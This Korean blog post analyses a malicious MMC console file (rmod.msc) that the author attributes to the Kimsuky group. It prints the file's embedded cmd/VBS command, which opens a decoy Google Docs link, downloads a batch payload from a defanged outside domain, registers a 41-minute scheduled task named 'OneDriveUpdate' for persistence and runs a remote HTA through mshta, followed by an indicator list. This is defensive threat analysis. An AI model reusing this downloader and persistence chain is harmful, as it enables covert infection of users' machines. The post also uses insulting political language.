해당 악성코드는 MMC(Microsoft Management Console,MMC)은 Windows의 관리 도구들을 통합적으로 실행하고 관리하기 위한 프레임워크 를 악용을 해서 만든 악성코드로 1년 전인가 사용을 했던 방식을 사용하고 있으며 VBS를 사용을 하는 것이 특징입니다.
파일명:rmod.msc
사이즈:1 MB
MD5:63678a326286014bcc69f901e33cadd1
SHA-1:19290ff8b50cb06f869f1a7132a4958218dc67f6
SHA-256:faba007fac1b9ba1f054aa54953fc65fd4603c20f617c7f620de65cb4d4a50c5
해당 악성코드는 실행 시 접근 권한이 없다고 하나…. 아무튼, 실행을 할 수가 없으나 지난 시간에 적은 악성코드 동작 방식과 동일 합니다.
[소프트웨어 팁/보안 및 분석] - 김정은 앵벌이 집단 김수키(Kimsuky)에서 만든 악성코드-internview.msc
김정은 앵벌이 집단 김수키(Kimsuky)에서 만든 악성코드-internview.msc
오늘은 김정은 팬티 사려고 앵벌이 하고 대동강 뷰 감상을 하려고 열심히 노력을 하는 북한 정찰총국 산하 해킹 단체인 김수키(Kimsuky)에서 만든 악성코드 인 internview.msc에 대해서 알아보겠습니
wezard4u.tistory.com
VBS 악성코드
<Task Type="CommandLine" Command="cmd.exe">
<String Name="Name" ID="5"/>
<String Name="Description" ID="11"/>
<Symbol>
<Image Name="Small" BinaryRefIndex="6"/>
<Image Name="Large" BinaryRefIndex="7"/>
</Symbol>
<Comm????ectory="" WindowState="Minimized" Params="/c mode 15,1&start explorer "hxxps://docs(.)google(.)com/document/d/1R3zhXXsPPWg3an0aV1SqdjlSC1dM17L2/edit?usp=sharing&ouid=110632654410291203272&rtpof=true&a???d=true"&echo ?????? Next:Set ws = Creat???t("WScript.S??ll"):Set fs = CreateObject("Scripting.FileSystemObject"):Set P?st0 = CreateObject(&q??????ml2.xmlhttp"):gpath = ws.????????ntStrings("%appdata%") (+) "\Microsoft\sus.gif":bpath = ws.ExpandEnvironmentStrings("%appdata%")(+) "\Microsoft\sus.bat":If fs.FileExists(gpath) Then:re=fs.m???efile(gpath,bpath):re=ws.run(bpath,0,true):fs.d(e)letefile(bpath):Else:Post0.open "GET", "hxxs://orientedworld(.)com/wp-content/plugins/healt?-check/pages/gorgon1/d(.)php?na=battmp",False: Post0.setRequestHeader "Content-Type", "application/x-www-form-urlencoded":Post0.Send:t0=Post0.responseText:Set f = fs.CreateTextFile(gpath,True):f(.)Write(t0):f.Close:End If:>"C:\Users\Public\Pictures\temp(.)vbs"&schtasks /create /tn OneDriveUpdate /tr "wscript(.)exe /b "C:\Users\Public\Pictures\temp.vbs"" /sc minute /mo 41 /f&start /min mshta hxxps://orientedworld(.)com/wp-content/plugins/health-check/pages/gorgon1/ttt(.)hta"/>
</Task>
</Tasks>악성코드 분석
해당 악성코드 명령은 Windows에서 다운로더(Downloader) 및 속성(Persistence) 확보를 하기 위한 악성코드입니다.
사용자에게 Google Docs 문서를 열어 정상 동작처럼 보이게 하는 것이며
실제 hxxps://orientedworld(.)com/.../d(.)php?na=battmp 에서 악성 페이로드를 다운로드 함
%APPDATA%\Microsoft\sus(.)gif 로 저장->sus.bat으로 이름 변경 후 실행
C:\Users\Public\Pictures\temp(.)vbs 를 만들어 41분마다 자동 실행되는 스케줄러 작업(OneDriveUpdate) 등록함
마지막으로 mshta 를 통해 또 다른 원격 스크립트(ttt(.)hta)를 실행
해당 명령은 사용자의 시스템에 악성코드 다운로드 기능을 하기 위한 악성코드
분석
동작 요약
msxml2.xmlhttp->원격 서버에서 데이터 다운로드
sus(.)gif->다운로드된 파일을 임시로 저장
sus(.)bat->실행용으로 이름 변경 후 바로 실행
schtasks->41분마다 실행되는 지속성 작업 등록
mshta->HTML Application(HTA) 악성코드 실행
Google Docs->사용자를 속이기 위한 미끼 주소
파일 경로
%APPDATA%\Microsoft\sus.gif
%APPDATA%\Microsoft\sus.bat
C:\Users\Public\Pictures\temp.vbs
작업 스케줄러 작업 등록
이름:OneDriveUpdate
주기:41분 간격
악성 도메인
hxxps://orientedworld(.)com/wp-content/plugins/health-check/pages/gorgon1/d(.)php?na=battmp
hxxps://orientedworld(.)com/wp-content/plugins/health-check/pages/gorgon1/ttt(.)hta
입니다. 이런 방식은 1~2년 전에 많이 사용을 하는 방식이었는데. 최근에도 자주 보이는 것 같습니다. 결론 우리의 주적은 북한이다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| 김수키(Kimsuky) 한컴 에이전트-국내 A형간염 현황 및 예방접종 권고 대상자 안내.pdf.scr.exe (0) | 2025.11.08 |
|---|---|
| 김수키(Kimsuky) 행정안전부 사칭 이메일 분석(2025.10.9) (0) | 2025.11.06 |
| 구글 크롬 2026년 10월부터 HTTPS 기본 활성화 (0) | 2025.11.05 |
| 북한 Lazarus(라자루스) 에서 만든 RAT PyLangGhost RAT 분석-nvidia.py (0) | 2025.11.04 |
| 모질라 파이어폭스 144.0.2 보안 업데이트 (0) | 2025.10.29 |
| 윈도우 업데이트로 위장한 클릭픽스(ClickFix) 공격 (0) | 2025.10.29 |
| VirtualBox CVE-2025-62641 취약점 공개 및 업데이트 (0) | 2025.10.28 |
| 김정은 앵벌이 집단 김수키(Kimsuky)에서 만든 악성코드-internview.msc (0) | 2025.10.27 |
